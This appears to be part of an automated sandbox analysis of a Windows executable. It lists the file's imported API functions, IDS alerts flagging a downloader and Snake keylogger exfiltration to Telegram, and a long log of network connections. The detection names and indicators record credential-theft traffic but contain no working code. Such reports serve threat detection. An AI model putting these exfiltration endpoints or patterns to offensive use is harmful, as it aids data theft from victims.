                                                                                                                              KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                              USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
                                                                                                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                              SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                                              ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                              EnglishUnited States
                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                              2024-12-16T09:05:33.778781+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449804172.217.19.174443TCP
                                                                                                                              2024-12-16T09:05:41.724171+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449826193.122.6.16880TCP
                                                                                                                              2024-12-16T09:05:49.708588+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449826193.122.6.16880TCP
                                                                                                                              2024-12-16T09:05:51.900356+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449852149.154.167.220443TCP
                                                                                                                              2024-12-16T09:05:53.508834+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449858193.122.6.16880TCP
                                                                                                                              2024-12-16T09:05:55.509609+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449861149.154.167.220443TCP
                                                                                                                              2024-12-16T09:05:59.009494+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449872149.154.167.220443TCP
                                                                                                                              2024-12-16T09:06:02.572563+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449883149.154.167.220443TCP
                                                                                                                              2024-12-16T09:06:06.332693+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449891149.154.167.220443TCP
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Dec 16, 2024 09:05:31.147376060 CET49804443192.168.2.4172.217.19.174
                                                                                                                              Dec 16, 2024 09:05:31.147422075 CET44349804172.217.19.174192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:31.147511959 CET49804443192.168.2.4172.217.19.174
                                                                                                                              Dec 16, 2024 09:05:31.165493965 CET49804443192.168.2.4172.217.19.174
                                                                                                                              Dec 16, 2024 09:05:31.165534973 CET44349804172.217.19.174192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:32.866229057 CET44349804172.217.19.174192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:32.866326094 CET49804443192.168.2.4172.217.19.174
                                                                                                                              Dec 16, 2024 09:05:32.867393970 CET44349804172.217.19.174192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:32.867468119 CET49804443192.168.2.4172.217.19.174
                                                                                                                              Dec 16, 2024 09:05:32.946434021 CET49804443192.168.2.4172.217.19.174
                                                                                                                              Dec 16, 2024 09:05:32.946512938 CET44349804172.217.19.174192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:32.946986914 CET44349804172.217.19.174192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:32.947062016 CET49804443192.168.2.4172.217.19.174
                                                                                                                              Dec 16, 2024 09:05:32.951417923 CET49804443192.168.2.4172.217.19.174
                                                                                                                              Dec 16, 2024 09:05:32.995383024 CET44349804172.217.19.174192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:33.778799057 CET44349804172.217.19.174192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:33.778882980 CET44349804172.217.19.174192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:33.778891087 CET49804443192.168.2.4172.217.19.174
                                                                                                                              Dec 16, 2024 09:05:33.778923035 CET49804443192.168.2.4172.217.19.174
                                                                                                                              Dec 16, 2024 09:05:33.779854059 CET49804443192.168.2.4172.217.19.174
                                                                                                                              Dec 16, 2024 09:05:33.779874086 CET44349804172.217.19.174192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:33.933680058 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:33.933722973 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:33.933783054 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:33.934046030 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:33.934062958 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:35.634788990 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:35.634923935 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:35.640613079 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:35.640635014 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:35.640943050 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:35.642479897 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:35.656537056 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:35.699348927 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.552872896 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.552988052 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.565912962 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.566004992 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.672166109 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.672280073 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.672292948 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.673542023 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.676326990 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.677331924 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.744189024 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.744580984 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.748074055 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.748166084 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.748173952 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.748836040 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.753772020 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.756557941 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.761651993 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.764991045 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.764997005 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.765038967 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.770908117 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.773503065 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.773762941 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.773924112 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.780189037 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.780971050 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.787563086 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.787620068 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.791441917 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.792694092 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.801289082 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.805525064 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.805531979 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.805589914 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.814812899 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.814917088 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.818023920 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.821515083 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.828466892 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.828982115 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.831650972 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.831727028 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.842170954 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.842286110 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.845347881 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.845447063 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.855901003 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.856724024 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.859127998 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.859178066 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.869621992 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.869679928 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.869719982 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.869779110 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.883246899 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.884483099 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.903295040 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.903382063 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.903394938 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.903433084 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.935935974 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.936031103 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.936043024 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.936084032 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.938086033 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.938132048 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.942645073 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.942697048 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.942722082 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.942760944 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.946393013 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.946445942 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.946470976 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.946506977 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.958904028 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.958956957 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.960294962 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.960345030 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.960354090 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.960397959 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.969774008 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.969835043 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.969908953 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.969954014 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.980671883 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.980740070 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.980830908 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.980880022 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.989608049 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.989679098 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:38.989684105 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:38.989727974 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.002029896 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.002151966 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.002166033 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.002237082 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.011015892 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.011102915 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.011115074 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.011158943 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.021136999 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.021193981 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.021243095 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.021280050 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.031052113 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.031167030 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.031193972 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.031251907 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.040024042 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.040096998 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.040117025 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.040149927 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.050889015 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.051017046 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.051207066 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.051248074 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.058753967 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.058840036 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.058850050 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.058903933 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.067821026 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.067871094 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.067914009 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.067950964 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.076564074 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.076622963 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.076790094 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.076826096 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.076832056 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.076869011 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.077971935 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.078008890 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.078064919 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.078092098 CET44349812142.250.181.1192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.078134060 CET49812443192.168.2.4142.250.181.1
                                                                                                                              Dec 16, 2024 09:05:39.849540949 CET4982680192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:39.969441891 CET8049826193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:39.969645977 CET4982680192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:39.969947100 CET4982680192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:40.089787960 CET8049826193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:41.243218899 CET8049826193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:41.247028112 CET4982680192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:41.366830111 CET8049826193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:41.675928116 CET8049826193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:41.724170923 CET4982680192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:42.148387909 CET49832443192.168.2.4104.21.67.152
                                                                                                                              Dec 16, 2024 09:05:42.148451090 CET44349832104.21.67.152192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:42.148523092 CET49832443192.168.2.4104.21.67.152
                                                                                                                              Dec 16, 2024 09:05:42.152631998 CET49832443192.168.2.4104.21.67.152
                                                                                                                              Dec 16, 2024 09:05:42.152663946 CET44349832104.21.67.152192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:43.368091106 CET44349832104.21.67.152192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:43.368242979 CET49832443192.168.2.4104.21.67.152
                                                                                                                              Dec 16, 2024 09:05:43.372093916 CET49832443192.168.2.4104.21.67.152
                                                                                                                              Dec 16, 2024 09:05:43.372147083 CET44349832104.21.67.152192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:43.372443914 CET44349832104.21.67.152192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:43.376308918 CET49832443192.168.2.4104.21.67.152
                                                                                                                              Dec 16, 2024 09:05:43.419339895 CET44349832104.21.67.152192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:43.808037996 CET44349832104.21.67.152192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:43.808118105 CET44349832104.21.67.152192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:43.808180094 CET49832443192.168.2.4104.21.67.152
                                                                                                                              Dec 16, 2024 09:05:43.822886944 CET49832443192.168.2.4104.21.67.152
                                                                                                                              Dec 16, 2024 09:05:49.255486965 CET4982680192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:49.376686096 CET8049826193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:49.660937071 CET8049826193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:49.708587885 CET4982680192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:49.803417921 CET49852443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:49.803546906 CET44349852149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:49.803700924 CET49852443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:49.804147005 CET49852443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:49.804181099 CET44349852149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:51.170268059 CET44349852149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:51.170392036 CET49852443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:51.188374043 CET49852443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:51.188457012 CET44349852149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:51.188801050 CET44349852149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:51.190689087 CET49852443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:51.235335112 CET44349852149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:51.235435963 CET49852443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:51.235460997 CET44349852149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:51.900382996 CET44349852149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:51.900486946 CET44349852149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:51.900569916 CET49852443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:51.901094913 CET49852443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:52.072551012 CET4982680192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:52.073790073 CET4985880192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:52.192671061 CET8049826193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:52.192724943 CET4982680192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:52.193563938 CET8049858193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:52.193945885 CET4985880192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:52.194066048 CET4985880192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:52.313707113 CET8049858193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:53.462896109 CET8049858193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:53.465639114 CET49861443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:53.465686083 CET44349861149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:53.465759993 CET49861443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:53.466325045 CET49861443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:53.466341019 CET44349861149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:53.508833885 CET4985880192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:54.834935904 CET44349861149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:54.836661100 CET49861443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:54.836680889 CET44349861149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:54.836801052 CET49861443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:54.836807966 CET44349861149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:55.509648085 CET44349861149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:55.509758949 CET44349861149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:55.509969950 CET49861443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:55.510580063 CET49861443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:55.529897928 CET4986680192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:55.649844885 CET8049866193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:55.649967909 CET4986680192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:55.650152922 CET4986680192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:55.770112991 CET8049866193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:56.931538105 CET8049866193.122.6.168192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:56.937427998 CET49872443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:56.937530994 CET44349872149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:56.938441992 CET49872443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:56.938687086 CET49872443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:56.938720942 CET44349872149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:56.974246025 CET4986680192.168.2.4193.122.6.168
                                                                                                                              Dec 16, 2024 09:05:58.300648928 CET44349872149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:58.302834988 CET49872443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:58.302860975 CET44349872149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:58.302937031 CET49872443192.168.2.4149.154.167.220
                                                                                                                              Dec 16, 2024 09:05:58.302944899 CET44349872149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:59.009798050 CET44349872149.154.167.220192.168.2.4
                                                                                                                              Dec 16, 2024 09:05:59.010135889 CET44349872149.154.167.220192.168.2.4
